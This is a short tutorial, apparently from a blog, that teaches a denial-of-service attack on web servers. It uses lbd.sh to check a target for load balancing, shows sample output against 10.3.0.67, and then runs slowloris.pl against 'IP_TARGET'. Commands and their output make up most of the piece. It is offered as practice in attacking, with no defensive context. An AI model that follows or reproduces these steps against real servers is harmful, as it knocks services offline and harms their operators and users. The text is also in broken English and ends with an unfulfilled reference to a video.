To Dos Web Server Attacks

The attack on the webserver so many managers felt by the webserver, and have to work extra to fix all the systems that have been exposed to dos attack. Have a friend do a DOS attack on a webserver? if not let us practice to perform dos attacks. Here I use 2 pieces of the file first lbd.sh useful to see if the webserver is using load-balancing or not, the second is slowloris.pl used to perform dos attacks.

1. Download file lbd.sh and slowloris.pL here, then unrar.

2. Check Load-Balancing of the target webserver.

-------------------------------------------------------------------------------------------------------------

root@bt:~# cd dos
root@bt:~# ./lbd.sh IP_TARGET

---------------------------------------------------------------------------------- 

Example

----------------------------------------------------------------------------------

root@bt:~/dos# ./lbd.sh 10.3.0.67

lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing.
                                    Written by Stefan Behte (http://ge.mine.nu)
                                    Proof-of-concept! Might give false positives.

Checking for DNS-Loadbalancing: NOT FOUND
Checking for HTTP-Loadbalancing [Server]: 
 Apache/2.2.0 (Win32) DAV/2 mod_ssl/2.2.0 OpenSSL/0.9.8a mod_autoindex_color PHP/4.4.1-pl1
 NOT FOUND

Checking for HTTP-Loadbalancing [Date]: 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:29, 15:16:29, 15:16:29, 15:16:29, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

10.3.0.67 does NOT use Load-balancing.

root@bt:~/dos# 

---------------------------------------------------------------------------------

If the answer is "10.3.0.67 does NOT use load-balancing." then we will perform dos attacks.

---------------------------------------------------------------------------------

 root@bt:~/dos# ./slowloris.pl -dns IP_TARGET

--------------------------------------------------------------------------------- 

For other types of attacks that can be seen in the file slowloris.pl.

 The video follows.